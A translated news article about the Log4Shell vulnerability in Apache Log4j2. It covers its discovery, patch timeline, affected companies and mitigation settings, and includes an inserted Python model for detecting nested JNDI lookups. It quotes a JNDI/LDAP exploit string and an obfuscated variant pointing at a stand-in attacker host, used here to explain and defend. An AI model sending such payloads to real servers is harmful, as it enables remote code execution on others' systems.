
Chinese programmers preemptively warned of "epic" bugs that swept through Apple Tesla

Author: New Zhiyuan

Editor: Technical Group

On November 24, 2021, Alibaba Cloud's security team continued to screen for vulnerabilities as usual.

Unexpectedly, one team member, Chen Zhaojun, dug out what has been called one of the "biggest and most serious vulnerabilities in the past decade": Log4Shell.


With this vulnerability, an attacker only needs to submit a string to reach the target server, and can even upload and run arbitrary code on it!

As a result, on December 10th, programmers at the major tech companies who were already preparing for the weekend had to get up and work overtime to deal with the vulnerability.


How many major companies have been affected by this vulnerability?

Because the Log4j2 library is so widely used, large companies including Apple, Tesla, Amazon, Cloudflare, ElasticSearch, Red Hat, Twitter, Steam, Baidu, NetEase and Tencent are affected.


Possibly hundreds, if not thousands, of other organizations will also be affected.

Some information security researchers expect a significant increase in attacks on servers on the internet in the coming days.

A moment of horror

On November 24, a remote code execution vulnerability in the open source project Apache Log4j2 was reported.

On the morning of December 7, Apache released the 2.15.0-rc1 update.

On the evening of December 9, details of the exploit were made public; it affects almost every release (from 2.0 through 2.14.1-rc1).

When everyone upgraded to 2.15.0-rc1, it was found that the patch could still be bypassed.

At around 2:30 a.m. on December 10, Apache Log4j2 was urgently updated with version 2.15.0-rc2.

By then, nearly all the major companies were staying up late to apply fixes.


According to incomplete statistics from Tinder Security, on GitHub alone 60,644 open source projects, which have released 321,094 packages, are at risk; the vulnerability can be said to affect the normal operation of more than 70% of enterprise systems on the Internet.


The top 10 Java development frameworks affected by Log4j2 (Source: Tinder Security)

The vulnerability, tracked as CVE-2021-44228 and also known as Log4Shell or LogJam, is a remote code execution (RCE) vulnerability in Log4j2, an open source Java logging library used by "millions" of applications.

Since Java applications typically log a wide variety of events, such as messages sent and received by users, or details of system errors, the vulnerability can be triggered in a number of ways.


The most dangerous part of this vulnerability is that it is too easy for attackers to exploit, and even ordinary people with no experience can use this vulnerability to successfully perform attacks.

An attacker can execute arbitrary code by simply sending a special message to the server (one containing a string like ${jndi:ldap://server.com/a}), and may thereby take full control of the system.


According to Alibaba's @programmer Ziyou, the server, via Log4j2, logs the JNDI- and LDAP-based malicious payload contained in the request the attacker sends, in which the referenced address (http://attacker.com in this example) is controlled by the attacker.

When the server performs the JNDI request to http://server.com and the malicious payload is triggered, http://attacker.com can include arbitrary executable code in its response, which is then loaded into the server process.


So, last weekend, security teams at companies large and small scrambled to patch the Log4Shell vulnerability, which could otherwise let attackers compromise millions of Internet-connected devices at any moment.

And the attackers were not idle: security vendor Imperva observed more than 1.4 million attacks on CVE-2021-44228 that day.


New Zealand's Computer Emergency Response Team (CERT), Deutsche Telekom and Greynoise's network monitoring service have all warned that "attackers are already actively exploiting this vulnerability."

According to Greynoise, about 100 different hosts are looking for ways to exploit the Log4j2 vulnerability at scale.

Soon, several information security news organizations reported on this critical vulnerability found in the Apache Log4j2 library with a CVSS severity of 10, CVE-2021-44228.

The Alibaba Cloud security team issued an announcement on December 10.


https://help.aliyun.com/noticelist/articleid/1060971232.html

The National Internet Emergency Response Center issued an announcement on December 10.


https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html

The U.S. National Computer Vulnerability Database was announced on December 10.


https://nvd.nist.gov/vuln/detail/CVE-2021-44228

The Apache Foundation also responded quickly, recommending that all developers upgrade the Log4j2 library they use to version 2.15.0 and, if an upgrade is not possible for some reason, apply the mitigations described on the Apache Log4j2 security vulnerabilities page.

On December 12, some netizens reported that banking apps were unusable and speculated that the banks were working overtime to check their systems; the scope of the impact does indeed seem to be quite large.


At this point, the programmers were about to cry and complained:

"Overnight Repair"


"Busy most of the day"


The national search engine Baidu was the first to be stress-tested by a crowd of netizens!

When the vulnerability was first exposed, entering a crafted string in the Baidu search box produced a visible callback in DNSLog; Baidu's developers then urgently fixed the vulnerability.


Then netizens found that even Apple, long known for its security, was affected.


Minecraft was also hit.

Because Minecraft also uses Log4j2 and is so widely played, servers for every Minecraft version except Mohist 1.18 were left in a high-risk state.

In this state, entering commands in the chat bar allows a player to cheat in the game.


For Minecraft server owners, the most important thing to do at the moment is to immediately shut down the server and carry out upgrades and emergency repairs, and ordinary players need to wait until the server confirms that the repair is complete.


According to the recommendations of 360, users can do the following.

For users of Apache Log4j2, update to the latest official security release (2.15.0-rc2). Download address:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

Modify the Log4j2 configuration:

log4j2.formatMsgNoLookups=true

Or set the JVM startup parameter:

-Dlog4j2.formatMsgNoLookups=true

Or set the environment variable:

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS=true

The following settings or actions may help protect against this incident, but they are not guaranteed; configure them according to your actual application scenario:

Use as high a JDK version as possible.

Use RASP to block the lookup call.

Use a WAF to intercept ${jndi in traffic.

Block all unnecessary external data.
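As an added example (not from the article or from the Log4j project), the following Python models how Log4j2's message-lookup substitution turns a logged string such as ${jndi:ldap://server.com/a} into a JNDI resolution, as described above, and why the WAF advice to intercept ${jndi should evaluate nested lookups rather than match the literal string. The LookupRecorder class, the find_jndi_lookups function and the sample log inputs are constructed here; nothing is contacted, the model only records the JNDI target a vulnerable version would have resolved, and no_lookups=True models the formatMsgNoLookups setting.

```python
# Added example (not from the article or Log4j): a toy model of Log4j2 "${...}" lookup
# substitution. It never performs a real JNDI/LDAP request; it only records the target.
SAMPLE_LOG_INPUTS = [  # constructed values an application might log, not real traffic
    "GET /index.html from user-agent Mozilla/5.0",
    "login failed for user ${jndi:ldap://server.com/a}",
    "${${lower:j}ndi:${lower:ldap}://attacker.com/x}",  # nesting hides a literal "${jndi"
]

class LookupRecorder:
    """Hypothetical stand-in for Log4j2's message substitutor. no_lookups=True models
    log4j2.formatMsgNoLookups=true: the message is logged verbatim, nothing is evaluated."""
    def __init__(self, no_lookups=False):
        self.no_lookups = no_lookups
        self.jndi_attempts = []  # JNDI targets a vulnerable Log4j2 would have contacted

    def _lookup(self, key):
        prefix, _, rest = key.partition(":")
        prefix = prefix.lower()  # Log4j2 matches lookup prefixes case-insensitively
        if prefix == "jndi":
            self.jndi_attempts.append(rest)  # real Log4j2 would fetch and run code from here
            return ""
        if prefix in ("lower", "upper"):
            return rest.lower() if prefix == "lower" else rest.upper()
        return "${" + key + "}"  # unknown lookup: left in the message as literal text

    def substitute(self, text):
        if self.no_lookups:
            return text
        out, i = [], 0
        while i < len(text):
            if not text.startswith("${", i):
                out.append(text[i]); i += 1
                continue
            depth, j = 1, i + 2  # scan to the matching "}" while allowing nesting
            while j < len(text) and depth:
                if text.startswith("${", j):
                    depth, j = depth + 1, j + 2
                    continue
                if text[j] == "}": depth -= 1
                j += 1
            if depth:  # unterminated "${": keep the remainder literally
                out.append(text[i:])
                break
            out.append(self._lookup(self.substitute(text[i + 2:j - 1])))  # inner lookups first
            i = j
        return "".join(out)

def find_jndi_lookups(text):  # the check a WAF or log scanner should make, not a string match
    rec = LookupRecorder()
    rec.substitute(text)
    return rec.jndi_attempts
```

Running find_jndi_lookups over SAMPLE_LOG_INPUTS flags the second and third lines even though only the second contains the literal text "${jndi".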

As soon as the Log4j2 security incident broke, many users inevitably began to wonder again: is open source software really safe?

On the one hand, everyone assumes that with open source software the code is in your hands, and as long as you comply with the license you can basically use it for free without giving anything back.

On the other hand, they assume that with so many people watching the code there can surely be no bugs, since otherwise someone would open an issue to get it fixed. At no cost, they expect enterprise-grade maintenance support and security guarantees.


Little do they know that most open source software is developed by its authors in their spare time, and the motivation for contributing code to the community comes entirely from GitHub stars and "generating electricity with love" (volunteer enthusiasm).

It is precisely because it is free that some open source software has an especially large user base, from small companies to enterprises worth hundreds of billions; if a vulnerability appears, the consequences are unimaginable.

Therefore, open source is risky, and it needs to be used with caution!

